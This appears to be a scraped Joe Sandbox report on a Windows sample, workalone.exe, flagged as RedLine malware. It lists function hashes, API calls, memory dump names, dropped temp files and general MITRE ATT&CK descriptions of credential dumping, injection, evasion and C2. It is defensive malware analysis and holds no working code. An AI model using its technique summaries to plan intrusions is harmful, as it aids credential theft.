Instruction ID: 6b1a47ff9c68d4eb674fae8ed2f0eb6006043b629f877e06379be66a9b0277a5
Opcode Fuzzy Hash: 5c7050963f01dfa60476c0e10ff7608ae2474a3521758b3f13ea5094725b0866
Instruction Fuzzy Hash: E2115BB1D002488FCB10CFAAC4487EFFBF4AB88324F10842AD419A7200D7789544CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 054D08E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 054D0947

Strings

R, xrefs: 054D08FF

Memory Dump Source

Source File: 00000001.00000002.416784184.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_54d0000_workalone.jbxd

Similarity

API ID: ConsoleWindow
String ID: R
API String ID: 2863861424-880014062
Opcode ID: 36080a5ded1bf729e977dcbc00789a9c052032637370b238c2a0b482fcc5a075
Instruction ID: ff53efaebdf32a496ed5cec47c4278042d799894fbd23c27901a99b30e7231f3
Opcode Fuzzy Hash: 36080a5ded1bf729e977dcbc00789a9c052032637370b238c2a0b482fcc5a075
Instruction Fuzzy Hash: 5F114871D043498FDB10DFAAC4987DFFBF4AB48224F14882AC159A7240DB79A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 065EC6CF Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 065EC73C

Memory Dump Source

Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3d139bd01fb81b779f3c43953e2f0d1dd08656d335c924600e992b5cd07ddda3
Instruction ID: 1d7054b72493df85b177cbfaf29f6b1c3d12868ac1d04a8f4885eef09a4eabc8
Opcode Fuzzy Hash: 3d139bd01fb81b779f3c43953e2f0d1dd08656d335c924600e992b5cd07ddda3
Instruction Fuzzy Hash: D2116A79A05218DFCF94CFA8E4446AB7BE9FB45215F04487AD816E7201E738E905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 065E4718 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E28,?,?,065E45D6), ref: 065E4786

Memory Dump Source

Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b91b16685633d0dabdf4c936321fc5ce41474cd47b2756f1c9d12989aaf3046c
Instruction ID: d6504a7ea758c45299e3e024b05e9f40bf57732b238adfaf04bf73a6135c705a
Opcode Fuzzy Hash: b91b16685633d0dabdf4c936321fc5ce41474cd47b2756f1c9d12989aaf3046c
Instruction Fuzzy Hash: F41123B5C003488FCB10CFAAC844BCEFBF8AB89224F15846AD419B7210C779A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 065E40B8 Relevance: 1.6, APIs: 1, Instructions: 53
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E28,?,?,065E45D6), ref: 065E4786

Memory Dump Source

Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fe87406dd31b6266ba8e71154747ed478bd74ad09f6652d0578ed0713bfd1618
Instruction ID: 597c6ec7a835126fd3da3c67674f84eaafb5367c342a58ef2c86ae3a2796ef1a
Opcode Fuzzy Hash: fe87406dd31b6266ba8e71154747ed478bd74ad09f6652d0578ed0713bfd1618
Instruction Fuzzy Hash: AC1112B5D007488FCB10DF9AD444B9EFBF8AB89224F15846AD519B7210C774A946CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 065EC711 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 065EC73C

Memory Dump Source

Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ecc35578b21b3507bb05d25c17be3d96d7f88fdbd9a68798a42de409c1e6821f
Instruction ID: fdbc8f716a6c43be9f7bb96fb7ebddc5795f2320998f6c7ae62bf70d8dc74e4a
Opcode Fuzzy Hash: ecc35578b21b3507bb05d25c17be3d96d7f88fdbd9a68798a42de409c1e6821f
Instruction Fuzzy Hash: 97F01C76601214CBDF24CF20E5446AB77A9FB85612B15887ADC15A3344D77CAD45CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0152D054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_152d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12937dff2a171c385e2a35e3a0c1caa952aa6b098c17846c5f79f918e7e8f1fe
Instruction ID: aedfdff8acb84ef1a5a1afe2eb9969826110068f80df6a582df9e0bcbe0143f7
Opcode Fuzzy Hash: 12937dff2a171c385e2a35e3a0c1caa952aa6b098c17846c5f79f918e7e8f1fe
Instruction Fuzzy Hash: E721F7B2504240DFCB15DF54D8C0B1ABBB5FB89314F24C669EA054F296C33AD816CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0152D5E0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_152d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028d30f194cddfcd2890b4eeb5acc37b0a589a64bf3f45996115ea06b4f5227e
Instruction ID: 768d6e8becbf582ef1e1270d4fcbcf4a3b88d6aa4975b08a6779d13b42901ca2
Opcode Fuzzy Hash: 028d30f194cddfcd2890b4eeb5acc37b0a589a64bf3f45996115ea06b4f5227e
Instruction Fuzzy Hash: 4A2133B2504244DFDB25DF94C8C0B2ABBB1FB88324F248568E9094F286C336E845CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0153D2C4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.405953738.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_153d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a58e49ebda9b6dd644e1371f2019be963028ddcdaca25f88ad5a42afd2c6e0bb
Instruction ID: f9fd80a9674e84aba8da916bc4117ad90f53839a1714de537c3568c825aeea61
Opcode Fuzzy Hash: a58e49ebda9b6dd644e1371f2019be963028ddcdaca25f88ad5a42afd2c6e0bb
Instruction Fuzzy Hash: 7A2123B5508244DFDB01CF94D8C0B2ABBB5FBC4324F64C969E8494F246C37AD846CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0153D474 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.405953738.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_153d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 716601df4b15f1c1b3bb5a169d68d5d178848a5c6adad7291ce3775f5111aa7b
Instruction ID: 683e8b1d8808eb6836652d5cc3ea0a38dad333c3fada333ca999c8c62b466173
Opcode Fuzzy Hash: 716601df4b15f1c1b3bb5a169d68d5d178848a5c6adad7291ce3775f5111aa7b
Instruction Fuzzy Hash: 292137B1504204EFCB01CFA4C5C0B26BBB5FBC8318F64C9ADE8094F282C376E805CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0152D04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_152d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c68b780470a692cffba5d5c172d1dc2d37718c3676a307186d6e24ff2d5362e
Instruction ID: dcd614602cd4e2db2bc802811403994a1404bab23944c5d80a9696c71aa307b3
Opcode Fuzzy Hash: 0c68b780470a692cffba5d5c172d1dc2d37718c3676a307186d6e24ff2d5362e
Instruction Fuzzy Hash: EC219D76404280DFCF16CF54D9C4B1ABF72FB89314F2886A9DD480A656C33AD466CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0152D5DB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_152d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28d7f9b6c052c6bf27c54b29b78abe899c0e928c1954ef857855ef63c427eb8
Instruction ID: 64359bdb8b1e3d5361cab43398c70fb956ff178a6183dfb9456f30397a9a9c6d
Opcode Fuzzy Hash: c28d7f9b6c052c6bf27c54b29b78abe899c0e928c1954ef857855ef63c427eb8
Instruction Fuzzy Hash: 4E119D76504280CFCB12CF54D5C4B5ABF71FB89320F2886A9D8494A656C336E45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0153D2BF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.405953738.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_153d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2056ad9b9ef873465a40eadaffaa1e695ca515c10e19c4fea7bc9f37b489fc
Instruction ID: 4b4e5b97ef138fbf3fea79dd322e02f1bb42f782151d18a7ad7cd6bab4255443
Opcode Fuzzy Hash: 1e2056ad9b9ef873465a40eadaffaa1e695ca515c10e19c4fea7bc9f37b489fc
Instruction Fuzzy Hash: 6A118F76504680DFDB12CF14D5C4B19FF71FB84324F28C6AAD8494B646C33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0153D46F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.405953738.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_153d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1c577071c2d0f69f9c0c2e3af2bcc6dc79f4eb61d5675d3e9761bf736dafb1
Instruction ID: 8283c8e10ce21a016adff4017e4b40ba134324c8e563678ff9b99df6696e7155
Opcode Fuzzy Hash: ac1c577071c2d0f69f9c0c2e3af2bcc6dc79f4eb61d5675d3e9761bf736dafb1
Instruction Fuzzy Hash: F1119D75504280DFDB12CF54D5C4B19BFB1FB88328F28C6AAD8494F696C33AD45ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0152DAB9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_152d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a548cfcde629fc885a0af99e48314ba9a71cbeb661c3f4e69df7ac72386ef37c
Instruction ID: 1e80b2fcc6d2bfce40f1dad29fa9ed499f2566cd30d3eec45e00d89c5b92f6e5
Opcode Fuzzy Hash: a548cfcde629fc885a0af99e48314ba9a71cbeb661c3f4e69df7ac72386ef37c
Instruction Fuzzy Hash: A401FC720083549AE7104A65DC84B67BBF8FF46224F18C45AEE045F1C6C7B59844DA71

Uniqueness

Uniqueness Score: -1.00%

Function 0152DAB8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_152d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804228146d01f9dd5c05b3933de149d39aec89aa975dc92b3ffa3107e4ef8ea4
Instruction ID: 703e319295db0c48b30174791ebd1d7b157f00a1dbabfc43792bcc02e12db4af
Opcode Fuzzy Hash: 804228146d01f9dd5c05b3933de149d39aec89aa975dc92b3ffa3107e4ef8ea4
Instruction Fuzzy Hash: 98F0F6724043949EEB208E0ADCC4B67FFB8EF81634F18C45AED085F286C3799844DAB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 054DD2F0 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.416784184.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_54d0000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8998a765ccb464864dbb7ad52ae1865c0cb824700e6b6d98f284d329ceea16e8
Instruction ID: f943eaf3a7903a7ffa5a7e4271edb06e92bec510e24672cb6b122e3aa3616431
Opcode Fuzzy Hash: 8998a765ccb464864dbb7ad52ae1865c0cb824700e6b6d98f284d329ceea16e8
Instruction Fuzzy Hash: AFD1CF35B002159FCB14DB78C464AAEB7F6FF88214B1584BAE906DB391DF34DC058BA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report workalone.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\workalone.exe.log

C:\Users\user\AppData\Local\Temp\tmp10B8.tmp

C:\Users\user\AppData\Local\Temp\tmp10E8.tmp

C:\Users\user\AppData\Local\Temp\tmp1B45.tmp

C:\Users\user\AppData\Local\Temp\tmp1B56.tmp

C:\Users\user\AppData\Local\Temp\tmp4075.tmp

C:\Users\user\AppData\Local\Temp\tmp4D35.tmp

C:\Users\user\AppData\Local\Temp\tmp4D74.tmp

C:\Users\user\AppData\Local\Temp\tmp6FB4.tmp

C:\Users\user\AppData\Local\Temp\tmp6FE4.tmp

C:\Users\user\AppData\Local\Temp\tmp7EB6.tmp

C:\Users\user\AppData\Local\Temp\tmp82DA.tmp

C:\Users\user\AppData\Local\Temp\tmp8319.tmp

C:\Users\user\AppData\Local\Temp\tmp93B7.tmp

Windows Analysis Report
workalone.exe

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre